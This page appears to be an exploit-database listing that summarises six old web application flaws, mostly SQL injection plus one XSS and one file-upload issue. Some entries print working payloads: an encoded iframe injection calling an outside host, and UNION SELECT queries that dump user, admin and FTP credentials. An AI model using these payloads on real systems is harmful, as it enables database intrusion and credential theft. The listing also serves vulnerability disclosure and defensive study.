Explore Vulnerabilities

Explore all Exploits:

Web Group Communication Center [XSS/SQL] Multiple Remote Vulnerabilities

The application is vulnerable to XSS and SQL Injection. An attacker can inject malicious code in the application by using the URL http://[target]/[path]/profile.php?action=show&userid=%22%3E%3C%69%66%72%61%6D%65%20%73%72%63%D%68%74%74%70%3A%2F%2F%68%61%2E%63%6B%65%72%73%2E%6F%72%67%2F%73%63%72%69%70%74%6C%65%74%2E%68%74%6D%6C%3C. An attacker can also use the SQL injection vulnerability to gain access to the application's database by using the URL http://[target]/[path]/profile.php?action=show&saction=moreinfo&userid=-1+UNION+SELECT+1,concat(username,0x3a,password,0x3a,email)+FROM+wgcc_user--. There are also other URLs which can be used to exploit the SQL injection vulnerability.

Zogo-shop 1.16 Beta 13 & e-107 Zozo-shop Plugins remote SQL Inj.

Zogo-shop 1.16 Beta 13 & e-107 Zozo-shop Plugins are vulnerable to a remote SQL injection vulnerability. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. This can allow the attacker to gain access to the database and execute arbitrary SQL commands.

e107 Plugin BLOG Engine v2.2 (rid) Blind SQL Injection

The vulnerability exists in the comment.php file of the e107 Plugin BLOG Engine v2.2. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server. The attacker can use the 'rid' parameter to inject malicious SQL code into the query. The attacker can use the 'and 1=1--' and 'and 1=2--' strings to check if the query is valid. The attacker can also use the 'substring(@@version,1,1)=4' string to check the MySQL version. The attacker can use the sqlmap tool to exploit this vulnerability.

CMS Made Simple <= 1.2.4 (FileManager module) Arbitrary File Upload Exploit

CMS Made Simple version 1.2.4 and below is vulnerable to an arbitrary file upload vulnerability due to a lack of proper input validation in the FileManager module. An attacker can upload a malicious file to the server by bypassing the file extension check in the javaUpload.php script. This can be done by setting the $allow_or_deny_method variable to 'allow' and leaving the $file_extension_list array empty.

Mega File Hosting script

Register an account, log in, go to /members.php?folders=1 and create a folder with any name. Exploitation options include: Step 1: Go to /members.php?folders=1&fid=-1+union+all+select+1,2,concat(user,0x3a,email),pass,5,6,7,8+from+users+-- to get the users; Step 2: Go to /members.php?folders=1&fid=-1+union+all+select+1,2,admin,pass,5,6,7,8+from+setting+-- to get the admin info; Step 3: Go to /members.php?folders=1&fid=-1+union+all+select+1,2,user,pass,5,6,7,8+from+server+-- to get the FTP server info (if it's configured).

Battle.net Clan Script <= 1.5.x - Remote SQL Inj Exploit

Battle.net Clan Script version 1.5.x is vulnerable to a remote SQL injection vulnerability. The vulnerability exists due to insufficient sanitization of user-supplied input in the 'showmember' parameter of the 'members' page. An attacker can exploit this vulnerability to execute arbitrary SQL commands in the application's back-end database, allowing them to access or modify sensitive data.

Recent Exploits: